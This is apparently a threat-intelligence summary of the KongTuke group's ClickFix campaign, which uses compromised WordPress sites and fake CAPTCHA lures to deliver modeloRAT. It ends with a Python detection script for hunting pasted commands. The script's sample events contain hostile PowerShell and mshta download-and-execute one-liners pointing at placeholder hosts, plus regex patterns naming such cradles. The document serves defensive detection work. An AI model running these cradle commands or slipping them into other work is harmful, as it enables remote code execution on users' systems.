Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

Summary: Trend Micro's Managed Detection and Response (MDR) analysis revealed that the KongTuke threat group continues to use compromised WordPress websites and fake CAPTCHA lures to deploy the modeloRAT malware.

Our analysis of an active KongTuke campaign deploying modeloRAT—malware capable of reconnaissance, command execution, and persistent access—through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique. The attackers inject malicious JavaScript into legitimate WordPress websites, prompting users to run a PowerShell command that triggers a multistage infection process. Organizations whose users browse compromised websites or encounter prompts asking them to run commands could be at risk. The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.

Key facts

  • KongTuke uses compromised WordPress sites and fake CAPTCHA lures to deliver the modeloRAT malware.
  • The attack vector leverages legitimate system tools like PowerShell for persistence.
  • Organizations with enterprise environments are at higher risk due to targeted checks by the malware.
  • The group continues to use ClickFix alongside the newer CrashFix technique.

Why it matters

This technique poses significant risks to enterprises because it relies on legitimate, signed system tools such as PowerShell to maintain persistence without triggering alarms, which makes it harder for traditional security measures to detect and mitigate the threat.
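The delivery chain described above ends with a user pasting a PowerShell one-liner that a fake CAPTCHA page hands them, so one practical hunt is to look for interpreters launched from the user's shell together with a download-and-execute cradle. The following is an added example, not code from Trend Micro's analysis; the event records are constructed, the field names are assumed to follow Sysmon-style process-creation events, and the assumption that a pasted command runs as a child of explorer.exe is the author's, not a claim from the page.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields).
# The URLs are placeholders; none of these values come from the analysis above.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://example.invalid/captcha)"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c mshta https://example.invalid/verify"},
    {"parent": r"C:\Program Files\Build\agent.exe",   # benign CI job, should not fire
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\ci\\build.ps1"},
]

# Remote download-and-execute cradles commonly seen in pasted one-liners.
CRADLE = re.compile(
    r"\b(iex|invoke-expression|irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring)\b"
    r"|mshta\s+https?://", re.I)
# Switches that hide the console or sidestep policy; noisy on their own.
EVASION = re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass|-enc", re.I)
USER_SHELLS = ("explorer.exe",)          # assumption: Run dialog / pasted commands land here
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

def classify(event):
    """Return the reasons an event resembles a ClickFix-style pasted command, or []."""
    reasons = []
    parent = event["parent"].lower().rsplit("\\", 1)[-1]
    image = event["image"].lower().rsplit("\\", 1)[-1]
    cmd = event["cmdline"]
    if parent in USER_SHELLS and image in INTERPRETERS:
        reasons.append("interpreter launched from user shell")
    if CRADLE.search(cmd):
        reasons.append("remote download/execute cradle")
    if EVASION.search(cmd):
        reasons.append("evasion switches")
    # Require parent context plus payload evidence; any single indicator alone is too noisy.
    return reasons if len(reasons) >= 2 else []

def hunt(events):
    """Return (command line, reasons) for every event that classify() flags."""
    return [(e["cmdline"], classify(e)) for e in events if classify(e)]
```

Feed real process-creation telemetry into hunt() and pair hits with the browser history of the same user session to recover the compromised site that served the lure.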
